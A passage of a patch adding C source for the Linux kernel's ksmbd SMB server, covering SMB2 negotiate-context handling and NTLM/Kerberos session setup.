++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_encryption_neg_context) + 2;
++		/* Round to 8 byte boundary */
++		pneg_ctxt +=
++			round_up(sizeof(struct smb2_encryption_neg_context) + 2,
++				 8);
++	}
++
++	if (conn->compress_algorithm) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_COMPRESSION_CAPABILITIES context\n");
++		/* Temporarily set to SMB3_COMPRESS_NONE */
++		build_compression_ctxt((struct smb2_compression_capabilities_context *)pneg_ctxt,
++				       conn->compress_algorithm);
++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_compression_capabilities_context) + 2;
++		/* Round to 8 byte boundary */
++		pneg_ctxt += round_up(sizeof(struct smb2_compression_capabilities_context) + 2,
++				      8);
++	}
++
++	if (conn->posix_ext_supported) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
++		build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_posix_neg_context);
++		/* Round to 8 byte boundary */
++		pneg_ctxt += round_up(sizeof(struct smb2_posix_neg_context), 8);
++	}
++
++	if (conn->signing_negotiated) {
++		ctxt_size = round_up(ctxt_size, 8);
++		ksmbd_debug(SMB,
++			    "assemble SMB2_SIGNING_CAPABILITIES context\n");
++		build_sign_cap_ctxt((struct smb2_signing_capabilities *)pneg_ctxt,
++				    conn->signing_algorithm);
++		rsp->NegotiateContextCount = cpu_to_le16(++neg_ctxt_cnt);
++		ctxt_size += sizeof(struct smb2_signing_capabilities) + 2;
++	}
++
++	inc_rfc1001_len(smb2_buf_len, ctxt_size);
++}
++
++static __le32 decode_preauth_ctxt(struct ksmbd_conn *conn,
++				  struct smb2_preauth_neg_context *pneg_ctxt,
++				  int ctxt_len)
++{
++	/*
++	 * sizeof(smb2_preauth_neg_context) assumes SMB311_SALT_SIZE Salt,
++	 * which may not be present. Only check for used HashAlgorithms[1].
++	 */
++	if (ctxt_len <
++	    sizeof(struct smb2_neg_context) + MIN_PREAUTH_CTXT_DATA_LEN)
++		return STATUS_INVALID_PARAMETER;
++
++	if (pneg_ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		return STATUS_NO_PREAUTH_INTEGRITY_HASH_OVERLAP;
++
++	conn->preauth_info->Preauth_HashId = SMB2_PREAUTH_INTEGRITY_SHA512;
++	return STATUS_SUCCESS;
++}
++
++static void decode_encrypt_ctxt(struct ksmbd_conn *conn,
++				struct smb2_encryption_neg_context *pneg_ctxt,
++				int ctxt_len)
++{
++	int cph_cnt;
++	int i, cphs_size;
++
++	if (sizeof(struct smb2_encryption_neg_context) > ctxt_len) {
++		pr_err("Invalid SMB2_ENCRYPTION_CAPABILITIES context size\n");
++		return;
++	}
++
++	conn->cipher_type = 0;
++
++	cph_cnt = le16_to_cpu(pneg_ctxt->CipherCount);
++	cphs_size = cph_cnt * sizeof(__le16);
++
++	if (sizeof(struct smb2_encryption_neg_context) + cphs_size >
++	    ctxt_len) {
++		pr_err("Invalid cipher count(%d)\n", cph_cnt);
++		return;
++	}
++
++	if (!(server_conf.flags & KSMBD_GLOBAL_FLAG_SMB2_ENCRYPTION))
++		return;
++
++	for (i = 0; i < cph_cnt; i++) {
++		if (pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_GCM ||
++		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES128_CCM ||
++		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_CCM ||
++		    pneg_ctxt->Ciphers[i] == SMB2_ENCRYPTION_AES256_GCM) {
++			ksmbd_debug(SMB, "Cipher ID = 0x%x\n",
++				    pneg_ctxt->Ciphers[i]);
++			conn->cipher_type = pneg_ctxt->Ciphers[i];
++			break;
++		}
++	}
++}
++
++/**
++ * smb3_encryption_negotiated() - checks if server and client agreed on enabling encryption
++ * @conn:	smb connection
++ *
++ * Return:	true if connection should be encrypted, else false
++ */
++bool smb3_encryption_negotiated(struct ksmbd_conn *conn)
++{
++	if (!conn->ops->generate_encryptionkey)
++		return false;
++
++	/*
++	 * SMB 3.0 and 3.0.2 dialects use the SMB2_GLOBAL_CAP_ENCRYPTION flag.
++	 * SMB 3.1.1 uses the cipher_type field.
++	 */
++	return (conn->vals->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION) ||
++	    conn->cipher_type;
++}
++
++static void decode_compress_ctxt(struct ksmbd_conn *conn,
++				 struct smb2_compression_capabilities_context *pneg_ctxt)
++{
++	conn->compress_algorithm = SMB3_COMPRESS_NONE;
++}
++
++static void decode_sign_cap_ctxt(struct ksmbd_conn *conn,
++				 struct smb2_signing_capabilities *pneg_ctxt,
++				 int ctxt_len)
++{
++	int sign_algo_cnt;
++	int i, sign_alos_size;
++
++	if (sizeof(struct smb2_signing_capabilities) > ctxt_len) {
++		pr_err("Invalid SMB2_SIGNING_CAPABILITIES context length\n");
++		return;
++	}
++
++	conn->signing_negotiated = false;
++	sign_algo_cnt = le16_to_cpu(pneg_ctxt->SigningAlgorithmCount);
++	sign_alos_size = sign_algo_cnt * sizeof(__le16);
++
++	if (sizeof(struct smb2_signing_capabilities) + sign_alos_size >
++	    ctxt_len) {
++		pr_err("Invalid signing algorithm count(%d)\n", sign_algo_cnt);
++		return;
++	}
++
++	for (i = 0; i < sign_algo_cnt; i++) {
++		if (pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_HMAC_SHA256_LE ||
++		    pneg_ctxt->SigningAlgorithms[i] == SIGNING_ALG_AES_CMAC_LE) {
++			ksmbd_debug(SMB, "Signing Algorithm ID = 0x%x\n",
++				    pneg_ctxt->SigningAlgorithms[i]);
++			conn->signing_negotiated = true;
++			conn->signing_algorithm =
++				pneg_ctxt->SigningAlgorithms[i];
++			break;
++		}
++	}
++}
++
++static __le32 deassemble_neg_contexts(struct ksmbd_conn *conn,
++				      struct smb2_negotiate_req *req,
++				      unsigned int len_of_smb)
++{
++	/* +4 is to account for the RFC1001 len field */
++	struct smb2_neg_context *pctx = (struct smb2_neg_context *)req;
++	int i = 0, len_of_ctxts;
++	unsigned int offset = le32_to_cpu(req->NegotiateContextOffset);
++	unsigned int neg_ctxt_cnt = le16_to_cpu(req->NegotiateContextCount);
++	__le32 status = STATUS_INVALID_PARAMETER;
++
++	ksmbd_debug(SMB, "decoding %d negotiate contexts\n", neg_ctxt_cnt);
++	if (len_of_smb <= offset) {
++		ksmbd_debug(SMB, "Invalid response: negotiate context offset\n");
++		return status;
++	}
++
++	len_of_ctxts = len_of_smb - offset;
++
++	while (i++ < neg_ctxt_cnt) {
++		int clen, ctxt_len;
++
++		if (len_of_ctxts < (int)sizeof(struct smb2_neg_context))
++			break;
++
++		pctx = (struct smb2_neg_context *)((char *)pctx + offset);
++		clen = le16_to_cpu(pctx->DataLength);
++		ctxt_len = clen + sizeof(struct smb2_neg_context);
++
++		if (ctxt_len > len_of_ctxts)
++			break;
++
++		if (pctx->ContextType == SMB2_PREAUTH_INTEGRITY_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_PREAUTH_INTEGRITY_CAPABILITIES context\n");
++			if (conn->preauth_info->Preauth_HashId)
++				break;
++
++			status = decode_preauth_ctxt(conn,
++						     (struct smb2_preauth_neg_context *)pctx,
++						     ctxt_len);
++			if (status != STATUS_SUCCESS)
++				break;
++		} else if (pctx->ContextType == SMB2_ENCRYPTION_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_ENCRYPTION_CAPABILITIES context\n");
++			if (conn->cipher_type)
++				break;
++
++			decode_encrypt_ctxt(conn,
++					    (struct smb2_encryption_neg_context *)pctx,
++					    ctxt_len);
++		} else if (pctx->ContextType == SMB2_COMPRESSION_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_COMPRESSION_CAPABILITIES context\n");
++			if (conn->compress_algorithm)
++				break;
++
++			decode_compress_ctxt(conn,
++					     (struct smb2_compression_capabilities_context *)pctx);
++		} else if (pctx->ContextType == SMB2_NETNAME_NEGOTIATE_CONTEXT_ID) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_NETNAME_NEGOTIATE_CONTEXT_ID context\n");
++		} else if (pctx->ContextType == SMB2_POSIX_EXTENSIONS_AVAILABLE) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_POSIX_EXTENSIONS_AVAILABLE context\n");
++			conn->posix_ext_supported = true;
++		} else if (pctx->ContextType == SMB2_SIGNING_CAPABILITIES) {
++			ksmbd_debug(SMB,
++				    "deassemble SMB2_SIGNING_CAPABILITIES context\n");
++
++			decode_sign_cap_ctxt(conn,
++					     (struct smb2_signing_capabilities *)pctx,
++					     ctxt_len);
++		}
++
++		/* offsets must be 8 byte aligned */
++		offset = (ctxt_len + 7) & ~0x7;
++		len_of_ctxts -= offset;
++	}
++	return status;
++}
++
++/**
++ * smb2_handle_negotiate() - handler for smb2 negotiate command
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0
++ */
++int smb2_handle_negotiate(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_negotiate_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_negotiate_rsp *rsp = smb2_get_msg(work->response_buf);
++	int rc = 0;
++	unsigned int smb2_buf_len, smb2_neg_size;
++	__le32 status;
++
++	ksmbd_debug(SMB, "Received negotiate request\n");
++	conn->need_neg = false;
++	if (ksmbd_conn_good(conn)) {
++		pr_err("conn->tcp_status is already in CifsGood State\n");
++		work->send_no_response = 1;
++		return rc;
++	}
++
++	smb2_buf_len = get_rfc1002_len(work->request_buf);
++	smb2_neg_size = offsetof(struct smb2_negotiate_req, Dialects);
++	if (smb2_neg_size > smb2_buf_len) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		rc = -EINVAL;
++		goto err_out;
++	}
++
++	if (req->DialectCount == 0) {
++		pr_err("malformed packet\n");
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		rc = -EINVAL;
++		goto err_out;
++	}
++
++	if (conn->dialect == SMB311_PROT_ID) {
++		unsigned int nego_ctxt_off = le32_to_cpu(req->NegotiateContextOffset);
++
++		if (smb2_buf_len < nego_ctxt_off) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++
++		if (smb2_neg_size > nego_ctxt_off) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++
++		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		    nego_ctxt_off) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++	} else {
++		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		    smb2_buf_len) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			rc = -EINVAL;
++			goto err_out;
++		}
++	}
++
++	conn->cli_cap = le32_to_cpu(req->Capabilities);
++	switch (conn->dialect) {
++	case SMB311_PROT_ID:
++		conn->preauth_info =
++			kzalloc(sizeof(struct preauth_integrity_info),
++				GFP_KERNEL);
++		if (!conn->preauth_info) {
++			rc = -ENOMEM;
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			goto err_out;
++		}
++
++		status = deassemble_neg_contexts(conn, req,
++						 get_rfc1002_len(work->request_buf));
++		if (status != STATUS_SUCCESS) {
++			pr_err("deassemble_neg_contexts error(0x%x)\n",
++			       status);
++			rsp->hdr.Status = status;
++			rc = -EINVAL;
++			kfree(conn->preauth_info);
++			conn->preauth_info = NULL;
++			goto err_out;
++		}
++
++		rc = init_smb3_11_server(conn);
++		if (rc < 0) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			kfree(conn->preauth_info);
++			conn->preauth_info = NULL;
++			goto err_out;
++		}
++
++		ksmbd_gen_preauth_integrity_hash(conn,
++						 work->request_buf,
++						 conn->preauth_info->Preauth_HashValue);
++		rsp->NegotiateContextOffset =
++				cpu_to_le32(OFFSET_OF_NEG_CONTEXT);
++		assemble_neg_contexts(conn, rsp, work->response_buf);
++		break;
++	case SMB302_PROT_ID:
++		init_smb3_02_server(conn);
++		break;
++	case SMB30_PROT_ID:
++		init_smb3_0_server(conn);
++		break;
++	case SMB21_PROT_ID:
++		init_smb2_1_server(conn);
++		break;
++	case SMB2X_PROT_ID:
++	case BAD_PROT_ID:
++	default:
++		ksmbd_debug(SMB, "Server dialect :0x%x not supported\n",
++			    conn->dialect);
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++		rc = -EINVAL;
++		goto err_out;
++	}
++	rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
++
++	/* For stats */
++	conn->connection_type = conn->dialect;
++
++	rsp->MaxTransactSize = cpu_to_le32(conn->vals->max_trans_size);
++	rsp->MaxReadSize = cpu_to_le32(conn->vals->max_read_size);
++	rsp->MaxWriteSize = cpu_to_le32(conn->vals->max_write_size);
++
++	memcpy(conn->ClientGUID, req->ClientGUID,
++			SMB2_CLIENT_GUID_SIZE);
++	conn->cli_sec_mode = le16_to_cpu(req->SecurityMode);
++
++	rsp->StructureSize = cpu_to_le16(65);
++	rsp->DialectRevision = cpu_to_le16(conn->dialect);
++	/* Not setting conn guid rsp->ServerGUID, as it
++	 * not used by client for identifying server
++	 */
++	memset(rsp->ServerGUID, 0, SMB2_CLIENT_GUID_SIZE);
++
++	rsp->SystemTime = cpu_to_le64(ksmbd_systime());
++	rsp->ServerStartTime = 0;
++	ksmbd_debug(SMB, "negotiate context offset %d, count %d\n",
++		    le32_to_cpu(rsp->NegotiateContextOffset),
++		    le16_to_cpu(rsp->NegotiateContextCount));
++
++	rsp->SecurityBufferOffset = cpu_to_le16(128);
++	rsp->SecurityBufferLength = cpu_to_le16(AUTH_GSS_LENGTH);
++	ksmbd_copy_gss_neg_header((char *)(&rsp->hdr) +
++				  le16_to_cpu(rsp->SecurityBufferOffset));
++	inc_rfc1001_len(work->response_buf, sizeof(struct smb2_negotiate_rsp) -
++			sizeof(struct smb2_hdr) - sizeof(rsp->Buffer) +
++			 AUTH_GSS_LENGTH);
++	rsp->SecurityMode = SMB2_NEGOTIATE_SIGNING_ENABLED_LE;
++	conn->use_spnego = true;
++
++	if ((server_conf.signing == KSMBD_CONFIG_OPT_AUTO ||
++	     server_conf.signing == KSMBD_CONFIG_OPT_DISABLED) &&
++	    req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED_LE)
++		conn->sign = true;
++	else if (server_conf.signing == KSMBD_CONFIG_OPT_MANDATORY) {
++		server_conf.enforced_signing = true;
++		rsp->SecurityMode |= SMB2_NEGOTIATE_SIGNING_REQUIRED_LE;
++		conn->sign = true;
++	}
++
++	conn->srv_sec_mode = le16_to_cpu(rsp->SecurityMode);
++	ksmbd_conn_set_need_negotiate(conn);
++
++err_out:
++	if (rc < 0)
++		smb2_set_err_rsp(work);
++
++	return rc;
++}
++
++static int alloc_preauth_hash(struct ksmbd_session *sess,
++			      struct ksmbd_conn *conn)
++{
++	if (sess->Preauth_HashValue)
++		return 0;
++
++	sess->Preauth_HashValue = kmemdup(conn->preauth_info->Preauth_HashValue,
++					  PREAUTH_HASHVALUE_SIZE, GFP_KERNEL);
++	if (!sess->Preauth_HashValue)
++		return -ENOMEM;
++
++	return 0;
++}
++
++static int generate_preauth_hash(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	u8 *preauth_hash;
++
++	if (conn->dialect != SMB311_PROT_ID)
++		return 0;
++
++	if (conn->binding) {
++		struct preauth_session *preauth_sess;
++
++		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
++		if (!preauth_sess) {
++			preauth_sess = ksmbd_preauth_session_alloc(conn, sess->id);
++			if (!preauth_sess)
++				return -ENOMEM;
++		}
++
++		preauth_hash = preauth_sess->Preauth_HashValue;
++	} else {
++		if (!sess->Preauth_HashValue)
++			if (alloc_preauth_hash(sess, conn))
++				return -ENOMEM;
++		preauth_hash = sess->Preauth_HashValue;
++	}
++
++	ksmbd_gen_preauth_integrity_hash(conn, work->request_buf, preauth_hash);
++	return 0;
++}
++
++static int decode_negotiation_token(struct ksmbd_conn *conn,
++				    struct negotiate_message *negblob,
++				    size_t sz)
++{
++	if (!conn->use_spnego)
++		return -EINVAL;
++
++	if (ksmbd_decode_negTokenInit((char *)negblob, sz, conn)) {
++		if (ksmbd_decode_negTokenTarg((char *)negblob, sz, conn)) {
++			conn->auth_mechs |= KSMBD_AUTH_NTLMSSP;
++			conn->preferred_auth_mech = KSMBD_AUTH_NTLMSSP;
++			conn->use_spnego = false;
++		}
++	}
++	return 0;
++}
++
++static int ntlm_negotiate(struct ksmbd_work *work,
++			  struct negotiate_message *negblob,
++			  size_t negblob_len)
++{
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct challenge_message *chgblob;
++	unsigned char *spnego_blob = NULL;
++	u16 spnego_blob_len;
++	char *neg_blob;
++	int sz, rc;
++
++	ksmbd_debug(SMB, "negotiate phase\n");
++	rc = ksmbd_decode_ntlmssp_neg_blob(negblob, negblob_len, work->conn);
++	if (rc)
++		return rc;
++
++	sz = le16_to_cpu(rsp->SecurityBufferOffset);
++	chgblob =
++		(struct challenge_message *)((char *)&rsp->hdr.ProtocolId + sz);
++	memset(chgblob, 0, sizeof(struct challenge_message));
++
++	if (!work->conn->use_spnego) {
++		sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
++		if (sz < 0)
++			return -ENOMEM;
++
++		rsp->SecurityBufferLength = cpu_to_le16(sz);
++		return 0;
++	}
++
++	sz = sizeof(struct challenge_message);
++	sz += (strlen(ksmbd_netbios_name()) * 2 + 1 + 4) * 6;
++
++	neg_blob = kzalloc(sz, GFP_KERNEL);
++	if (!neg_blob)
++		return -ENOMEM;
++
++	chgblob = (struct challenge_message *)neg_blob;
++	sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
++	if (sz < 0) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	rc = build_spnego_ntlmssp_neg_blob(&spnego_blob, &spnego_blob_len,
++					   neg_blob, sz);
++	if (rc) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	sz = le16_to_cpu(rsp->SecurityBufferOffset);
++	memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
++	rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
++
++out:
++	kfree(spnego_blob);
++	kfree(neg_blob);
++	return rc;
++}
++
++static struct authenticate_message *user_authblob(struct ksmbd_conn *conn,
++						  struct smb2_sess_setup_req *req)
++{
++	int sz;
++
++	if (conn->use_spnego && conn->mechToken)
++		return (struct authenticate_message *)conn->mechToken;
++
++	sz = le16_to_cpu(req->SecurityBufferOffset);
++	return (struct authenticate_message *)((char *)&req->hdr.ProtocolId
++					       + sz);
++}
++
++static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
++				       struct smb2_sess_setup_req *req)
++{
++	struct authenticate_message *authblob;
++	struct ksmbd_user *user;
++	char *name;
++	unsigned int name_off, name_len, secbuf_len;
++
++	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
++	if (secbuf_len < sizeof(struct authenticate_message)) {
++		ksmbd_debug(SMB, "blob len %d too small\n", secbuf_len);
++		return NULL;
++	}
++	authblob = user_authblob(conn, req);
++	name_off = le32_to_cpu(authblob->UserName.BufferOffset);
++	name_len = le16_to_cpu(authblob->UserName.Length);
++
++	if (secbuf_len < (u64)name_off + name_len)
++		return NULL;
++
++	name = smb_strndup_from_utf16((const char *)authblob + name_off,
++				      name_len,
++				      true,
++				      conn->local_nls);
++	if (IS_ERR(name)) {
++		pr_err("cannot allocate memory\n");
++		return NULL;
++	}
++
++	ksmbd_debug(SMB, "session setup request for user %s\n", name);
++	user = ksmbd_login_user(name);
++	kfree(name);
++	return user;
++}
++
++static int ntlm_authenticate(struct ksmbd_work *work)
++{
++	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct channel *chann = NULL;
++	struct ksmbd_user *user;
++	u64 prev_id;
++	int sz, rc;
++
++	ksmbd_debug(SMB, "authenticate phase\n");
++	if (conn->use_spnego) {
++		unsigned char *spnego_blob;
++		u16 spnego_blob_len;
++
++		rc = build_spnego_ntlmssp_auth_blob(&spnego_blob,
++						    &spnego_blob_len,
++						    0);
++		if (rc)
++			return -ENOMEM;
++
++		sz = le16_to_cpu(rsp->SecurityBufferOffset);
++		memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
++		rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
++		kfree(spnego_blob);
++		inc_rfc1001_len(work->response_buf, spnego_blob_len - 1);
++	}
++
++	user = session_user(conn, req);
++	if (!user) {
++		ksmbd_debug(SMB, "Unknown user name or an error\n");
++		return -EPERM;
++	}
++
++	/* Check for previous session */
++	prev_id = le64_to_cpu(req->PreviousSessionId);
++	if (prev_id && prev_id != sess->id)
++		destroy_previous_session(conn, user, prev_id);
++
++	if (sess->state == SMB2_SESSION_VALID) {
++		/*
++		 * Reuse session if anonymous try to connect
++		 * on reauthetication.
++		 */
++		if (conn->binding == false && ksmbd_anonymous_user(user)) {
++			ksmbd_free_user(user);
++			return 0;
++		}
++
++		if (!ksmbd_compare_user(sess->user, user)) {
++			ksmbd_free_user(user);
++			return -EPERM;
++		}
++		ksmbd_free_user(user);
++	} else {
++		sess->user = user;
++	}
++
++	if (conn->binding == false && user_guest(sess->user)) {
++		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
++	} else {
++		struct authenticate_message *authblob;
++
++		authblob = user_authblob(conn, req);
++		sz = le16_to_cpu(req->SecurityBufferLength);
++		rc = ksmbd_decode_ntlmssp_auth_blob(authblob, sz, conn, sess);
++		if (rc) {
++			set_user_flag(sess->user, KSMBD_USER_FLAG_BAD_PASSWORD);
++			ksmbd_debug(SMB, "authentication failed\n");
++			return -EPERM;
++		}
++	}
++
++	/*
++	 * If session state is SMB2_SESSION_VALID, We can assume
++	 * that it is reauthentication. And the user/password
++	 * has been verified, so return it here.
++	 */
++	if (sess->state == SMB2_SESSION_VALID) {
++		if (conn->binding)
++			goto binding_session;
++		return 0;
++	}
++
++	if ((rsp->SessionFlags != SMB2_SESSION_FLAG_IS_GUEST_LE &&
++	     (conn->sign || server_conf.enforced_signing)) ||
++	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
++		sess->sign = true;
++
++	if (smb3_encryption_negotiated(conn) &&
++			!(req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
++		rc = conn->ops->generate_encryptionkey(conn, sess);
++		if (rc) {
++			ksmbd_debug(SMB,
++					"SMB3 encryption key generation failed\n");
++			return -EINVAL;
++		}
++		sess->enc = true;
++		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		/*
++		 * signing is disable if encryption is enable
++		 * on this session
++		 */
++		sess->sign = false;
++	}
++
++binding_session:
++	if (conn->dialect >= SMB30_PROT_ID) {
++		chann = lookup_chann_list(sess, conn);
++		if (!chann) {
++			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
++			if (!chann)
++				return -ENOMEM;
++
++			chann->conn = conn;
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
++		}
++	}
++
++	if (conn->ops->generate_signingkey) {
++		rc = conn->ops->generate_signingkey(sess, conn);
++		if (rc) {
++			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
++			return -EINVAL;
++		}
++	}
++
++	if (!ksmbd_conn_lookup_dialect(conn)) {
++		pr_err("fail to verify the dialect\n");
++		return -ENOENT;
++	}
++	return 0;
++}
++
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++static int krb5_authenticate(struct ksmbd_work *work)
++{
++	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	char *in_blob, *out_blob;
++	struct channel *chann = NULL;
++	u64 prev_sess_id;
++	int in_len, out_len;
++	int retval;
++
++	in_blob = (char *)&req->hdr.ProtocolId +
++		le16_to_cpu(req->SecurityBufferOffset);
++	in_len = le16_to_cpu(req->SecurityBufferLength);
++	out_blob = (char *)&rsp->hdr.ProtocolId +
++		le16_to_cpu(rsp->SecurityBufferOffset);
++	out_len = work->response_sz -
++		(le16_to_cpu(rsp->SecurityBufferOffset) + 4);
++
++	/* Check previous session */
++	prev_sess_id = le64_to_cpu(req->PreviousSessionId);
++	if (prev_sess_id && prev_sess_id != sess->id)
++		destroy_previous_session(conn, sess->user, prev_sess_id);
++
++	if (sess->state == SMB2_SESSION_VALID)
++		ksmbd_free_user(sess->user);
++
++	retval = ksmbd_krb5_authenticate(sess, in_blob, in_len,
++					 out_blob, &out_len);
++	if (retval) {
++		ksmbd_debug(SMB, "krb5 authentication failed\n");
++		return -EINVAL;
++	}
++	rsp->SecurityBufferLength = cpu_to_le16(out_len);
++	inc_rfc1001_len(work->response_buf, out_len - 1);
++
++	if ((conn->sign || server_conf.enforced_signing) ||
++	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
++		sess->sign = true;
++
++	if (smb3_encryption_negotiated(conn)) {
++		retval = conn->ops->generate_encryptionkey(conn, sess);
++		if (retval) {
++			ksmbd_debug(SMB,
++				    "SMB3 encryption key generation failed\n");
++			return -EINVAL;
++		}
++		sess->enc = true;
++		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
++		sess->sign = false;
++	}
++
++	if (conn->dialect >= SMB30_PROT_ID) {
++		chann = lookup_chann_list(sess, conn);
++		if (!chann) {
++			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
++			if (!chann)
++				return -ENOMEM;
++
++			chann->conn = conn;
++			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
++		}
++	}
++
++	if (conn->ops->generate_signingkey) {
++		retval = conn->ops->generate_signingkey(sess, conn);
++		if (retval) {
++			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
++			return -EINVAL;
++		}
++	}
++
++	if (!ksmbd_conn_lookup_dialect(conn)) {
++		pr_err("fail to verify the dialect\n");
++		return -ENOENT;
++	}
++	return 0;
++}
++#else
++static int krb5_authenticate(struct ksmbd_work *work)
++{
++	return -EOPNOTSUPP;
++}
++#endif
++
++int smb2_sess_setup(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
++	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_session *sess;
++	struct negotiate_message *negblob;
++	unsigned int negblob_len, negblob_off;
++	int rc = 0;
++
++	ksmbd_debug(SMB, "Received request for session setup\n");
++
++	rsp->StructureSize = cpu_to_le16(9);
++	rsp->SessionFlags = 0;
++	rsp->SecurityBufferOffset = cpu_to_le16(72);
++	rsp->SecurityBufferLength = 0;
++	inc_rfc1001_len(work->response_buf, 9);
++
++	ksmbd_conn_lock(conn);
++	if (!req->hdr.SessionId) {
++		sess = ksmbd_smb2_session_create();
++		if (!sess) {
++			rc = -ENOMEM;
++			goto out_err;
++		}
++		rsp->hdr.SessionId = cpu_to_le64(sess->id);
++		rc = ksmbd_session_register(conn, sess);
++		if (rc)
++			goto out_err;
++	} else if (conn->dialect >= SMB30_PROT_ID &&
++		   (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
++		   req->Flags & SMB2_SESSION_REQ_FLAG_BINDING) {
++		u64 sess_id = le64_to_cpu(req->hdr.SessionId);
++
++		sess = ksmbd_session_lookup_slowpath(sess_id);
++		if (!sess) {
++			rc = -ENOENT;
++			goto out_err;
++		}
++
++		if (conn->dialect != sess->dialect) {
++			rc = -EINVAL;
++			goto out_err;
++		}
++
++		if (!(req->hdr.Flags & SMB2_FLAGS_SIGNED)) {
++			rc = -EINVAL;
++			goto out_err;
++		}
++
++		if (strncmp(conn->ClientGUID, sess->ClientGUID,
++			    SMB2_CLIENT_GUID_SIZE)) {
++			rc = -ENOENT;
++			goto out_err;
++		}
++
++		if (sess->state == SMB2_SESSION_IN_PROGRESS) {
++			rc = -EACCES;
++			goto out_err;
++		}
++
++		if (sess->state == SMB2_SESSION_EXPIRED) {
++			rc = -EFAULT;
++			goto out_err;
++		}
++
++		if (ksmbd_conn_need_reconnect(conn)) {
++			rc = -EFAULT;
++			sess = NULL;
++			goto out_err;
++		}
++
++		if (ksmbd_session_lookup(conn, sess_id)) {
++			rc = -EACCES;
++			goto out_err;
++		}
++
++		if (user_guest(sess->user)) {
++			rc = -EOPNOTSUPP;
++			goto out_err;
++		}
++
++		conn->binding = true;
++	} else if ((conn->dialect < SMB30_PROT_ID ||
++		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
